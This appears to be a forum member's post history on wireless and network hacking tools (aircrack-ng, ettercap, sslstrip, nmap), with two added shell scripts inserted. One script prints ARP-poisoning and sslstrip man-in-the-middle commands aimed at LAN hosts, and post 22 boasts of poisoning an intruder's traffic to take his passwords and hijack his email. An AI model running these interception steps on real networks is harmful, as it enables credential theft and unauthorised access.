
aeiah
Active Members
Posts: 48

Everything posted by aeiah

  1. Thanks for that. Curiously, I've got nmap v5.00 too, so I assume you were getting errors because of what the gateway was reporting. I've updated my script (located at the same location) with your amendments. Hopefully this script will now be a bit more robust.
  2. God damn it, I made one too around the same time but posted it a few weeks after, hehe: http://www.hak5.org/forums/index.php?showtopic=16158 My ettercap command is rather standard, just "ettercap -T -i interface -q -M arp:remote /gateway/ /target/". Do you know off the top of your head if that command monitors all ports by default? You've specified a lot in your script, so I guess mine only monitors port 80. I'll have to look into it.
  3. See what it identifies itself as; run lsusb if it's USB. Clearwave may not be the guys that do the chipset, and finding out what this card truly is may yield better results.
  4. Thanks for the description of your changes. Grabbing nmap output was bound to be a bit funky over different versions. I'll look into making it more bulletproof in the coming days. By the sounds of things, using -oG might simplify things. I'm not a regular user of nmap. Do you fancy posting your modified script here or on my blog?
  5. You could try another method, I suppose. I just install BackTrack like any other operating system rather than mess with USB sticks. Almost all Linux distributions will have aircrack and whatnot in their repos, so you could probably just go down that route. SliTaz, CrunchBang, Slax, and sidux are fairly small distros with decent live functionality. In fact, I think the custom SliTaz live CD that aircrack provide on their site will work out of the box with your card. I get the impression, since you've yet to master Google, that you may have problems with a lot of Linux distributions and tutorials, though.
  6. Pineapple
     They now use Open-Mesh routers instead of Fon, no? I don't think there's a risk of them permanently running out of stock for a while, as these are still produced and a number of places stock them.
  7. I think its biggest asset in the open-source community is to give you the ability to use others' code and build upon or contribute to existing projects. It's true that small utilities and things you do just by yourself rarely need to be object oriented. I suggested Ruby because of Metasploit. In truth, I think Python is far more useful.
  8. Well, it got covered in the recent episode of Hak5 (#0709), so I expect a lot will have heard of it. There was brief discussion prior to the episode airing, I think. It seems pretty interesting, but the one sticking point is the lack of network connectivity. I hear there is a mini-SD Wi-Fi card you can use? I think I speak for a lot of us when I say it'd be great to have support for a Wi-Fi card that can do packet injection, monitor mode, master mode, etc.
  9. Antenna Advice
     Your best bet is to solder a proper socket on, something like this, providing your antenna is RP-SMA (the standard now). Snip the end off and solder the sheath and inner cable to your circuit the same way as it is on your non-removable antenna.
  10. It's a USB host port, not client. You could hack the Nokia tablets to switch from host to client; perhaps this can do the same, but I wouldn't hold your breath.
  11. HTML and related things are markup languages, not programming languages. It's more relevant to learn programming theory and object-oriented programming than just learning the syntax of a new language. If you want to contribute to open-source software, Ruby and Python are probably two useful languages to know.
  12. So when the law gets involved because some script kiddie has done something silly, Hak5 will get negative press? Just use the tools available if they're up to scratch, or add new features to the best one if it's lacking in some area.
  13. Just set cron to do apt-get update && apt-get upgrade?
  14. Since BackTrack is already based on Ubuntu, why don't you create some packages for whatever drivers you're missing instead of reinventing the wheel? If you're wanting this to be a live CD / USB, then perhaps it'll be simpler to repackage BackTrack with the included drivers rather than package Ubuntu with all the software BackTrack uses.
  15. I think it goes without saying that you should spit out some WPA-PSK rainbow tables for Sky broadband. SSID: SKYxxxxx, where xxxxx are 5 random digits. 3-2-1-GO!
  16. $50-$100? Srsly? I'm a little skeptical of this coming to fruition for such a cost. I assume no one needs to tell you that an Atheros card capable of packet injection is a must ;) Are you using Maemo / Moblin / MeeGo or rolling your own distro?
  17. It's saying "standard error output received a message from tftp" (the transfer protocol used). It's stuck in a repetition loop, I'm guessing because it's lost communication? Have you tried just using plain old tftp with a serial terminal? I used minicom myself.
  18. So yes, insofar as using airdrop-ng (or, since it isn't really available yet, we'll say aireplay-ng) with packet-capturing applications other than aircrack-ng: well, if you're deauthenticating people to grab a handshake when they reauthenticate, then you can use Kismet, I guess, and then use coWPAtty for WPA or something else for WEP, but I like to keep everything within the aircrack-ng suite for simplicity and compatibility. It seems Cain and Abel can do packet injection and WEP cracking, but really, why bother? WEP cracking takes about 3 minutes with an automated script using the aircrack-ng suite. As for deauthenticating for other reasons, there's nothing stopping you using any other software, but it really depends on what you're doing. The only other reason I can think of that you'd want to deauthenticate someone, if you weren't wanting to crack WEP or WPA, is so they accidentally authenticate with you instead (a la Jasager, Karmetasploit, etc.). aireplay-ng (in this context) and airdrop-ng just do one thing: deauthenticate clients from access points. They don't gather any info or send anything out. What happens next and with what tools is up to the user to decide.
  19. Only one I end up using in Windows is alt+ctrl+delete+DELETE+DELETE+DELETE+DELETE+DELETE
  20. My blog post regarding it. The actual script depends on: Linux, iptables (NAT), nmap, ettercap (with iptables enabled in etter.conf), sslstrip. It just gives you a list of available targets on your LAN, sets things up and leaves you with ettercap for when passwords start showing up. Let me know how you get on if anyone decides to use it. It's not coded very beautifully, but it works for me and I'll try and get it working for others too.
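Posts 4 and 20 above describe the script's moving parts (scrape live hosts from nmap, set up the iptables redirect, run sslstrip, hand off to ettercap) and the trouble with parsing nmap's normal output across versions. The following is an added example, not aeiah's script or anything from the thread: it parses nmap's grepable (-oG) output, which is the stable format the thread suggests, and prints the setup commands as a dry run instead of executing them. The nmap output is a constructed sample, the sslstrip listening port 10000 and interface eth0 are assumptions, and the ettercap target syntax is the single-slash form quoted in post 2.

```shell
#!/bin/sh
# Added example (not the script from the post): list live LAN hosts from nmap -oG output and
# print the ARP-poison / sslstrip setup commands as a dry run. Nothing here touches the network.

# Constructed sample of `nmap -sn -oG - 192.168.1.0/24` output (not a real scan).
# Real -oG output separates fields with tabs; awk's default splitting handles tabs or spaces.
SAMPLE_OG='# Nmap 5.00 scan initiated Sat Jan  1 12:00:00 2011 as: nmap -sn -oG - 192.168.1.0/24
Host: 192.168.1.1 (router.lan)  Status: Up
Host: 192.168.1.7 ()  Status: Up
Host: 192.168.1.9 ()  Status: Down
Host: 192.168.1.23 (laptop.lan)  Status: Up
# Nmap done at Sat Jan  1 12:00:05 2011 -- 256 IP addresses (3 hosts up) scanned in 5.00 seconds'

# list_up_hosts: read -oG text on stdin, print one IPv4 address per "Status: Up" line.
# Comment lines (leading "#") and "Status: Down" hosts are skipped.
list_up_hosts() {
  awk '$1 == "Host:" && /Status: Up/ { print $2 }'
}

# targets_except GATEWAY: drop the gateway from the host list so it is never
# listed as a victim of its own ARP poisoning.
targets_except() {
  grep -v -x "$1"
}

# mitm_commands GATEWAY TARGET IFACE: print, in order, the steps post 20 describes:
# enable forwarding, redirect port 80 to sslstrip, start sslstrip, start ettercap
# (-T text UI, -q quiet, -M arp:remote poisons both gateway and target).
# Assumption: sslstrip listens on 10000; adjust --to-ports and -l together.
mitm_commands() {
  gw=$1; target=$2; iface=$3
  cat <<EOF
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -i $iface -p tcp --dport 80 -j REDIRECT --to-ports 10000
sslstrip -l 10000 -w sslstrip.log &
ettercap -T -i $iface -q -M arp:remote /$gw/ /$target/
EOF
}

# Stand-alone dry run over the constructed sample; one command set per target.
GATEWAY=192.168.1.1
printf '%s\n' "$SAMPLE_OG" | list_up_hosts | targets_except "$GATEWAY" | while read -r t; do
  echo "# target $t"
  mitm_commands "$GATEWAY" "$t" eth0
done
```

To use it against a real scan, replace the sample with `nmap -sn -oG - 192.168.1.0/24 | list_up_hosts`; the parser does not change between nmap versions because -oG is the format nmap intends for scripts. Keep the redirect and sslstrip ports in step, and remember that ettercap's own iptables redirect (the etter.conf setting post 20 mentions) must not fight with the rule printed here: use one or the other.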
  21. It doesn't do any capturing. aireplay doesn't do any capturing either; it just sends out deauthentication requests. What is it you're envisaging? It may already exist somewhere.
  22. Get a decent router and set up some firewall rules. Just block anything that isn't port 80 and 443 that's from a MAC that isn't yours. If he's crafty enough to clone your MAC, then ARP-poison and sslstrip him and get his passwords, send him an email from his own email address, and as soon as he checks it, disconnect him :P I did the latter to someone who hacked my WEP once. It was quite amusing to look at Wireshark and see him frantically logging into things to change passwords; then I left him dangling by changing to WPA before he had a chance to change them all.
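Post 22 suggests a router rule set in which your own MACs may do anything and every other MAC gets only TCP 80 and 443. The following is an added example, not anything aeiah posted: it generates that FORWARD-chain rule set with iptables' mac match and prints the commands rather than applying them, so they can be reviewed before being piped to sh on the router. The interface name br-lan and the MAC addresses are constructed placeholders.

```shell
#!/bin/sh
# Added example (not from the post): emit the FORWARD rules for "your MACs get everything,
# everyone else only web". Printing instead of running keeps this safe to review and test.

# lan_rules IFACE MAC [MAC...]: print iptables commands in the order they must be applied.
# Order matters: the per-MAC ACCEPT has to come before the 80/443 ACCEPT, otherwise your own
# hosts are silently limited to web traffic too.
lan_rules() {
  iface=$1; shift
  # Default deny for forwarded traffic from the LAN
  echo "iptables -P FORWARD DROP"
  # Replies for connections already permitted
  echo "iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT"
  # Your own machines: no restrictions (mac match is only valid in PREROUTING/INPUT/FORWARD)
  for mac in "$@"; do
    echo "iptables -A FORWARD -i $iface -m mac --mac-source $mac -j ACCEPT"
  done
  # Anyone else: web only
  echo "iptables -A FORWARD -i $iface -p tcp -m multiport --dports 80,443 -j ACCEPT"
  # Log (rate-limited) what the default policy drops, so you can watch the freeloader
  echo "iptables -A FORWARD -i $iface -m limit --limit 5/min -j LOG --log-prefix 'lan-drop: '"
}

# count_rules IFACE MAC...: number of commands produced, for sanity checks.
count_rules() {
  lan_rules "$@" | wc -l | tr -d ' '
}

# Stand-alone run with constructed placeholders.
lan_rules br-lan 00:11:22:33:44:55 66:77:88:99:aa:bb
```

Two caveats a practitioner would add. First, as literally stated in the post the stranger's traffic includes no UDP 53, so he will not resolve names at all; if the intent is "web only" rather than "nothing usable", a `-p udp --dport 53` ACCEPT belongs just before the 80/443 line. Second, the mac match trusts the source address in the frame, which is exactly the MAC cloning the post anticipates; it slows a casual freeloader down, it does not authenticate anyone, and the real fix in the post is the move to WPA.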
  23. I thought pcap was for packet capturing? All airdrop-ng does is send deauthentication messages to wireless access points. As far as I know, it's just a rather clever wrapper for aireplay-ng that lets you easily set up filter rules.